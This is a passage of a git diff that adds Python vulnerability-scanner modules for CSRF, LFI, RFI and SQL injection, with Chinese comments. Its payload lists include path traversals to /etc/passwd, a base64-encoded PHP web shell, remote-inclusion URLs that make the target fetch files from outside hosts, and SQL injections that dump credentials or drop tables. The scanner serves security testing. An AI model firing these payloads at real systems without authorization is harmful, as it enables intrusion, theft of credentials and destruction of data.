Binary files /dev/null and b/xss_scanner/scanners/__pycache__/rfi_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc
new file mode 100644
index 0000000..6297d99
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc
new file mode 100644
index 0000000..7af40bd
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/xss_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/xss_scanner.cpython-313.pyc
new file mode 100644
index 0000000..8863103
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/xss_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/__pycache__/xxe_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/xxe_scanner.cpython-313.pyc
new file mode 100644
index 0000000..7f6fcf2
Binary files /dev/null and b/xss_scanner/scanners/__pycache__/xxe_scanner.cpython-313.pyc differ
diff --git a/xss_scanner/scanners/csrf_scanner.py b/xss_scanner/scanners/csrf_scanner.py
new file mode 100644
index 0000000..3f5ba9c
--- /dev/null
+++ b/xss_scanner/scanners/csrf_scanner.py
@@ -0,0 +1,199 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+CSRF扫描器模块，负责扫描CSRF漏洞
+"""
+
+import re
+import logging
+import random
+import string
+from urllib.parse import urlparse, urljoin
+from bs4 import BeautifulSoup
+
+logger = logging.getLogger('xss_scanner')
+
+class CSRFScanner:
+    """CSRF扫描器类，负责扫描CSRF漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化CSRF扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 敏感操作关键词
+        self.sensitive_keywords = [
+            'user', 'account', 'profile', 'password', 'email', 'settings',
+            'admin', 'create', 'delete', 'remove', 'update', 'edit', 'modify',
+            'register', 'signup', 'login', 'logout', 'authenticate', 'auth',
+            'transfer', 'payment', 'pay', 'fund', 'money', 'order', 'checkout',
+            'purchase', 'buy', 'shop', 'cart', 'add', 'submit', 'confirm',
+            'upload', 'download', 'send', 'message', 'post', 'comment', 'reply',
+            'subscribe', 'unsubscribe', 'membership', 'join', 'leave'
+        ]
+        
+        # CSRF令牌常见名称
+        self.csrf_token_names = [
+            'csrf', 'xsrf', 'token', '_token', 'authenticity_token',
+            'csrf_token', 'xsrf_token', 'security_token', 'request_token',
+            'csrf-token', 'xsrf-token', 'anti-csrf', 'anti-xsrf',
+            '__RequestVerificationToken', '_csrf', '_xsrf', 'csrfmiddlewaretoken'
+        ]
+    
+    def scan_form(self, url, form, field=None):
+        """
+        扫描表单中的CSRF漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 表单字段（对CSRF扫描不需要）
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 如果是GET方法表单，则不检查CSRF
+        if form['method'].upper() == 'GET':
+            return None
+            
+        # 检查表单是否包含敏感操作关键词
+        form_action = form['action'].lower()
+        form_is_sensitive = any(keyword in form_action for keyword in self.sensitive_keywords)
+        
+        # 检查表单字段名称是否包含敏感关键词
+        for field in form.get('fields', []):
+            if field.get('name') and any(keyword in field['name'].lower() for keyword in self.sensitive_keywords):
+                form_is_sensitive = True
+                break
+                
+        # 如果表单不包含敏感操作，则不检查CSRF
+        if not form_is_sensitive:
+            return None
+            
+        logger.debug(f"扫描CSRF: {form['action']} @ {url}")
+        
+        # 检查表单是否包含CSRF令牌
+        has_csrf_token = False
+        token_field = None
+        
+        for field in form.get('fields', []):
+            field_name = field.get('name', '').lower()
+            
+            # 检查字段名称是否匹配CSRF令牌常见名称
+            if any(token_name in field_name for token_name in self.csrf_token_names):
+                has_csrf_token = True
+                token_field = field['name']
+                break
+                
+        # 如果表单包含CSRF令牌，则需要进一步验证
+        if has_csrf_token:
+            # 再次请求页面，验证CSRF令牌是否会改变
+            try:
+                token_value1 = self._get_csrf_token_value(url, token_field)
+                token_value2 = self._get_csrf_token_value(url, token_field)
+                
+                # 如果两次请求的令牌值相同，则可能存在CSRF漏洞
+                if token_value1 == token_value2:
+                    # 生成表单的唯一标识
+                    form_id = f"{form.get('id', '')}-{form['action']}"
+                    return {
+                        'type': 'CSRF',
+                        'url': url,
+                        'form_id': form_id,
+                        'parameter': token_field,
+                        'description': '表单中的CSRF令牌值在多次请求中保持不变，可能存在CSRF漏洞',
+                        'severity': 'Medium',
+                        'details': {
+                            'form_action': form['action'],
+                            'token_field': token_field,
+                            'token_value': token_value1
+                        }
+                    }
+            except Exception as e:
+                logger.error(f"验证CSRF令牌时出错: {str(e)}")
+        else:
+            # 如果表单不包含CSRF令牌，则存在CSRF漏洞
+            # 生成表单的唯一标识
+            form_id = f"{form.get('id', '')}-{form['action']}"
+            return {
+                'type': 'CSRF',
+                'url': url,
+                'form_id': form_id,
+                'description': '表单缺少CSRF令牌，可能存在CSRF漏洞',
+                'severity': 'High',
+                'details': {
+                    'form_action': form['action'],
+                    'form_method': form['method']
+                }
+            }
+            
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的CSRF漏洞（不适用于参数扫描）
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # CSRF漏洞通常与表单相关，不适用于URL参数扫描
+        return None
+    
+    def _get_csrf_token_value(self, url, token_field):
+        """
+        获取页面中CSRF令牌的值
+        
+        Args:
+            url: 页面URL
+            token_field: 令牌字段名
+            
+        Returns:
+            str: 令牌值，如果未找到则返回None
+        """
+        response = self.http_client.get(url)
+        if not response:
+            return None
+            
+        # 解析HTML
+        try:
+            soup = BeautifulSoup(response.text, 'html.parser')
+            
+            # 查找匹配的输入字段
+            input_field = soup.find('input', {'name': token_field})
+            if input_field and input_field.has_attr('value'):
+                return input_field['value']
+                
+            # 查找匹配的meta标签
+            meta_field = soup.find('meta', {'name': token_field})
+            if meta_field and meta_field.has_attr('content'):
+                return meta_field['content']
+                
+            # 查找匹配的JavaScript变量（简单实现，可能不适用于所有情况）
+            script_tags = soup.find_all('script')
+            for script in script_tags:
+                if script.string and token_field in script.string:
+                    # 简单的正则表达式匹配
+                    match = re.search(f"{token_field}['\"]?\\s*[:=]\\s*['\"]([^'\"]+)['\"]", script.string)
+                    if match:
+                        return match.group(1)
+        except Exception as e:
+            logger.error(f"获取CSRF令牌时发生错误: {str(e)}")
+            
+        return None
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return False 
\ No newline at end of file
diff --git a/xss_scanner/scanners/lfi_scanner.py b/xss_scanner/scanners/lfi_scanner.py
new file mode 100644
index 0000000..e2d8636
--- /dev/null
+++ b/xss_scanner/scanners/lfi_scanner.py
@@ -0,0 +1,331 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+LFI（本地文件包含）扫描器模块，负责扫描LFI漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import os
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class LFIScanner:
+    """LFI扫描器类，负责扫描本地文件包含漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化LFI扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # LFI检测Payload
+        self.payloads = [
+            # 基本路径遍历
+            "../../../../../../../etc/passwd",
+            "../../../../../../etc/passwd",
+            "../../../../../etc/passwd",
+            "../../../../etc/passwd",
+            "../../../etc/passwd",
+            "../../etc/passwd",
+            "../etc/passwd",
+            
+            # Windows系统文件
+            "../../../../../../../windows/win.ini",
+            "../../../../../../windows/win.ini",
+            "../../../../../windows/win.ini",
+            "../../../../windows/win.ini",
+            "../../../windows/win.ini",
+            "../../windows/win.ini",
+            "../windows/win.ini",
+            
+            # URL编码绕过
+            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
+            "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+            "%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd",
+            
+            # 空字节截断 (仅适用于某些PHP版本)
+            "../../../../../../../etc/passwd%00",
+            "../../../../../../../etc/passwd\0",
+            
+            # 双重URL编码
+            "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
+            
+            # 使用斜杠绕过
+            "....//....//....//etc/passwd",
+            "..././..././..././etc/passwd",
+            
+            # 使用过滤器包装器 (PHP)
+            "php://filter/convert.base64-encode/resource=/etc/passwd",
+            "php://filter/read=convert.base64-encode/resource=/etc/passwd",
+            "php://input",
+            "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ZWNobyAiU3VjY2VzcyI7Pz4=",
+            "expect://id",
+            
+            # 使用伪协议
+            "file:///etc/passwd",
+            "file:///../../../etc/passwd",
+            
+            # 路径参数污染
+            "file.php?path=/etc/passwd",
+            "file.php?path=../../../etc/passwd",
+            
+            # 向后兼容绕过
+            "/..././..././..././etc/passwd",
+            
+            # 绝对路径
+            "/etc/passwd",
+            "c:\\windows\\win.ini",
+            
+            # 嵌套的遍历序列
+            "....//....//....//etc/passwd",
+            "../....//....//etc/passwd",
+            
+            # 特殊字符绕过
+            "..%252f..%252f..%252fetc%252fpasswd",
+            
+            # Null字节混淆
+            "../../../etc/passwd%00.jpg",
+            "../../../etc/passwd\0.jpg",
+            
+            # Unicode / UTF-8编码
+            "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
+            "%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd"
+        ]
+        
+        # LFI成功检测模式
+        self.unix_patterns = [
+            # /etc/passwd文件内容特征
+            "root:.*:0:0:",
+            "bin:.*:1:1:",
+            "daemon:.*:2:2:",
+            "ftpuser:.*:.",
+            "rsh",
+            "ssh",
+            ".*usr.*bin.*\n"
+        ]
+        
+        self.windows_patterns = [
+            # Windows系统文件特征
+            "\\[extensions\\]",
+            "\\[mci extensions\\]",
+            "\\[fonts\\]",
+            "\\[files\\]",
+            "MAPI=1",
+            "mail=",
+            "\\[Mail\\]",
+            "\\[MCI Extensions\\]"
+        ]
+        
+        # PHP错误模式 (可能表明有漏洞，但需要进一步利用)
+        self.php_error_patterns = [
+            "failed to open stream: No such file or directory",
+            "failed to open stream: Permission denied",
+            "Failed opening required",
+            "Warning: include\\(",
+            "Warning: require_once\\(",
+            "Warning: require\\(",
+            "Warning: include_once\\("
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的LFI漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在LFI的字段名称
+        lfi_prone_fields = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in lfi_prone_fields):
+            return None
+            
+        logger.debug(f"扫描LFI: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测LFI漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含文件内容特征
+                if self._check_lfi_success(response.text):
+                    return {
+                        'type': 'LFI',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现本地文件包含(LFI)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在LFI漏洞，可以读取服务器上的敏感文件",
+                        'recommendation': "避免将用户输入直接传递给文件系统操作，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描LFI时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的LFI漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在LFI的参数名称
+        lfi_prone_params = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in lfi_prone_params):
+            return None
+            
+        logger.debug(f"扫描LFI参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测LFI漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                response = self.http_client.get(test_url)
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含文件内容特征
+                if self._check_lfi_success(response.text):
+                    return {
+                        'type': 'LFI',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现本地文件包含(LFI)漏洞",
+                        'details': f"URL参数{param}存在LFI漏洞，可以读取服务器上的敏感文件",
+                        'recommendation': "避免将用户输入直接传递给文件系统操作，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描LFI参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_lfi_success(self, content):
+        """
+        检查响应内容中是否包含LFI成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含LFI成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查Unix系统文件特征
+        for pattern in self.unix_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        # 检查Windows系统文件特征
+        for pattern in self.windows_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+        
+        # 检查PHP错误信息特征
+        # 注意：这需要进一步的验证，因为错误信息可能只是表明有漏洞，但未被成功利用
+        for pattern in self.php_error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                # 检查是否同时包含敏感信息，如路径
+                if re.search("/(var|etc|usr|opt|home)/", content):
+                    return True
+                if re.search("([A-Za-z]:\\\\|System32|Program Files)", content):
+                    return True
+                
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/rfi_scanner.py b/xss_scanner/scanners/rfi_scanner.py
new file mode 100644
index 0000000..aae50cb
--- /dev/null
+++ b/xss_scanner/scanners/rfi_scanner.py
@@ -0,0 +1,351 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+RFI（远程文件包含）扫描器模块，负责扫描RFI漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class RFIScanner:
+    """RFI扫描器类，负责扫描远程文件包含漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化RFI扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成随机标记，用于检测RFI漏洞
+        self.rfi_mark = 'RFI_' + self._generate_random_string(8)
+        
+        # RFI检测Payload
+        # 注意：在实际使用中，这些应该指向攻击者控制的服务器
+        # 出于安全考虑，这里使用的是公共可访问的测试服务
+        self.payloads = [
+            # 远程文件包含的基本测试
+            "http://example.com/rfi_test.txt",
+            "https://example.com/rfi_test.php",
+            "http://test.example.com/shell.txt",
+            
+            # 使用不同协议（实际使用中应指向攻击者控制的服务器）
+            "ftp://example.com/rfi_test.php",
+            "https://raw.githubusercontent.com/some-repo/test/master/info.php",
+            
+            # 使用端口和认证
+            "http://user:password@example.com:8080/rfi_test.php",
+            
+            # IP地址形式
+            "http://127.0.0.1/rfi_test.php",
+            "http://192.168.0.1/rfi_test.php",
+            "http://[::1]/rfi_test.php",
+            
+            # 使用单词编码
+            "http://%65%78%61%6d%70%6c%65.com/rfi_test.php",
+            
+            # URL编码绕过
+            "http%3A%2F%2Fexample.com%2Frfi_test.php",
+            
+            # 双重URL编码
+            "http%253A%252F%252Fexample.com%252Frfi_test.php",
+            
+            # 使用空字节截断（适用于某些PHP版本）
+            "http://example.com/rfi_test.php%00",
+            "http://example.com/rfi_test.php\0",
+            
+            # 使用注释截断
+            "http://example.com/rfi_test.php#",
+            "http://example.com/rfi_test.php?",
+            
+            # 使用双斜杠
+            "http://example.com//rfi_test.php",
+            
+            # 使用数据URI（PHP支持）
+            f"data://text/plain;base64,{self._encode_base64(f'<?php echo "{self.rfi_mark}"; ?>')}",
+            
+            # 使用PHP包装器
+            "php://input", 
+            
+            # 使用file://URL（仅当服务器和攻击者在同一台机器上）
+            "file:///var/www/html/rfi_test.php"
+        ]
+        
+        # 可能的RFI成功特征
+        self.success_patterns = [
+            re.escape(self.rfi_mark),  # 我们的标记
+            "root:.*:0:0:",  # 如果包含远程服务器系统文件
+            "\\<\\?php",     # PHP代码
+            "phpinfo\\(\\)", # PHP信息
+            "PHP Version",   # PHP版本信息
+            "www-data",      # Web服务用户
+            "HTTP_USER_AGENT", # PHP环境变量
+            "REMOTE_ADDR",   # PHP环境变量
+            "SERVER_ADDR",   # PHP环境变量
+            "DOCUMENT_ROOT", # PHP环境变量
+            "PATH_TRANSLATED", # PHP环境变量
+            "Warning: assert" # PHP警告
+        ]
+        
+        # PHP错误模式，可能表明存在漏洞但无法被成功利用
+        self.php_error_patterns = [
+            "failed to open stream: HTTP request failed",
+            "failed to open stream: Connection refused",
+            "failed to open stream: No such file or directory",
+            "Deprecated: Directive 'allow_url_include' is deprecated",
+            "Warning: include\\(", 
+            "Warning: remote_file_inclusion",
+            "allow_url_fopen must be enabled",
+            "allow_url_include must be enabled",
+            "Warning: include_once\\(",
+            "Failed to include '"
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的RFI漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在RFI的字段名称
+        rfi_prone_fields = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include',
+            'inc', 'locate', 'show', 'site', 'view', 'content'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in rfi_prone_fields):
+            return None
+            
+        logger.debug(f"扫描RFI: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测RFI漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 如果是data://或php://输入，需要准备额外的数据
+            post_data = None
+            if payload == "php://input":
+                post_data = f"<?php echo '{self.rfi_mark}'; ?>"
+                
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    if post_data:
+                        # 对于php://input，需要直接发送PHP代码
+                        response = self.http_client.post(action_url, data=form_data, 
+                                                         headers={"Content-Type": "application/x-www-form-urlencoded"}, 
+                                                         body=post_data)
+                    else:
+                        response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_rfi_success(response.text):
+                    return {
+                        'type': 'RFI',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现远程文件包含(RFI)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在RFI漏洞，可以执行远程服务器上的代码",
+                        'recommendation': "禁用PHP的allow_url_fopen和allow_url_include选项，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描RFI时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的RFI漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在RFI的参数名称
+        rfi_prone_params = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include',
+            'inc', 'locate', 'show', 'site', 'view', 'content'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in rfi_prone_params):
+            return None
+            
+        logger.debug(f"扫描RFI参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测RFI漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            # 如果是data://或php://输入，需要准备额外的数据
+            post_data = None
+            if payload == "php://input":
+                post_data = f"<?php echo '{self.rfi_mark}'; ?>"
+                
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                if post_data:
+                    # 对于php://input，需要直接发送PHP代码
+                    response = self.http_client.request("POST", test_url, 
+                                                       headers={"Content-Type": "application/x-www-form-urlencoded"}, 
+                                                       data=post_data)
+                else:
+                    response = self.http_client.get(test_url)
+                
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_rfi_success(response.text):
+                    return {
+                        'type': 'RFI',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现远程文件包含(RFI)漏洞",
+                        'details': f"URL参数{param}存在RFI漏洞，可以执行远程服务器上的代码",
+                        'recommendation': "禁用PHP的allow_url_fopen和allow_url_include选项，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描RFI参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_rfi_success(self, content):
+        """
+        检查响应内容中是否包含RFI成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含RFI成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查成功特征
+        for pattern in self.success_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        # 检查PHP错误信息特征，但需要进一步验证
+        for pattern in self.php_error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                # 如果响应中包含某些服务器信息，可能表明漏洞可以被进一步利用
+                if re.search("/(var|etc|usr|opt|home)/", content):
+                    return True
+                if re.search("([A-Za-z]:\\\\|System32|Program Files)", content):
+                    return True
+                    
+        return False
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length))
+    
+    def _encode_base64(self, text):
+        """
+        Base64编码
+        
+        Args:
+            text: 要编码的文本
+            
+        Returns:
+            str: Base64编码后的字符串
+        """
+        import base64
+        return base64.b64encode(text.encode()).decode()
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/sql_injection_scanner.py b/xss_scanner/scanners/sql_injection_scanner.py
new file mode 100644
index 0000000..8a03425
--- /dev/null
+++ b/xss_scanner/scanners/sql_injection_scanner.py
@@ -0,0 +1,664 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SQL注入扫描器模块，负责扫描SQL注入漏洞
+"""
+
+import re
+import logging
+import time
+import random
+from difflib import SequenceMatcher
+from urllib.parse import urlparse, urlencode, parse_qsl
+
+logger = logging.getLogger('xss_scanner')
+
+class SQLInjectionScanner:
+    """SQL注入扫描器类，负责扫描SQL注入漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SQL注入扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 基本的SQL注入Payload
+        self.payloads = {
+            'error_based': [
+                "'",
+                "\"",
+                "')",
+                "'))",
+                "\")",
+                "\"))",
+                "';",
+                "\";",
+                "')) OR 1=1--",
+                "')); OR 1=1--",
+                "')) OR '1'='1'--",
+                "')) OR '1'='1'#",
+                "' OR '1'='1'--",
+                "' OR '1'='1' --",
+                "' OR '1'='1'#",
+                "' OR '1'='1' #",
+                "' OR 1=1--",
+                "' OR 1=1 --",
+                "\" OR 1=1--",
+                "\" OR 1=1 --"
+            ],
+            'time_based': [
+                "' OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "') OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\" OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\") OR (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "';WAITFOR DELAY '0:0:3'--",
+                "');WAITFOR DELAY '0:0:3'--",
+                "\";WAITFOR DELAY '0:0:3'--",
+                "\");WAITFOR DELAY '0:0:3'--",
+                "' OR pg_sleep(3)--",
+                "') OR pg_sleep(3)--",
+                "' AND (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "') AND (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\" AND (SELECT * FROM (SELECT(SLEEP(3)))a)--",
+                "\") AND (SELECT * FROM (SELECT(SLEEP(3)))a)--"
+            ],
+            'union_based': [
+                "' UNION SELECT 1,2,3,4--",
+                "' UNION SELECT 1,2,3,4,5--",
+                "' UNION SELECT NULL,NULL,NULL,NULL--",
+                "' UNION SELECT username,password,3,4 FROM users--",
+                "' UNION ALL SELECT 1,2,3,4--",
+                "' UNION ALL SELECT 1,2,3,4,5--",
+                "' UNION ALL SELECT NULL,NULL,NULL,NULL--",
+                "' UNION ALL SELECT username,password,3,4 FROM users--"
+            ],
+            'boolean_based': [
+                "' AND 1=1--",
+                "' AND 1=2--",
+                "' OR 1=1--",
+                "' OR 1=2--",
+                "') AND 1=1--",
+                "') AND 1=2--",
+                "') OR 1=1--",
+                "') OR 1=2--"
+            ],
+            # 专门针对Email字段的SQL注入有效载荷
+            'email_specific': [
+                "test@test.com' OR 1=1--",
+                "test@test.com') OR 1=1--",
+                "test@test.com')) OR 1=1--",
+                "test@test.com'))) OR 1=1--",
+                "test@test.com'; DROP TABLE users--",
+                "test@test.com')) UNION SELECT username,password,3,4 FROM users--",
+                "test'+'@example.com",
+                "test@example.com' AND (SELECT 4821 FROM (SELECT(SLEEP(3)))test)--",
+                "test@example.com' OR EXISTS(SELECT * FROM users)--",
+                "test@example.com' AND EXISTS(SELECT * FROM users WHERE username='admin')--",
+                "test@example.com' UNION SELECT username,password FROM users--",
+                "admin'--@example.com",
+                "' UNION SELECT @@version,2#@example.com",
+                "admin'/**/OR/**/1=1#@example.com",
+                "test@example.com' AND 'x'='x",
+                "test@example.com' AND SLEEP(3)#",
+                "'; DECLARE @v nvarchar(max), @q nvarchar(max); SET @v = 'admin@example.com'; SET @q = 'SELECT * FROM Users WHERE email='''+@v+''''; EXEC(@q)--@test.com"
+            ]
+        }
+        
+        # SQL错误特征
+        self.sql_errors = [
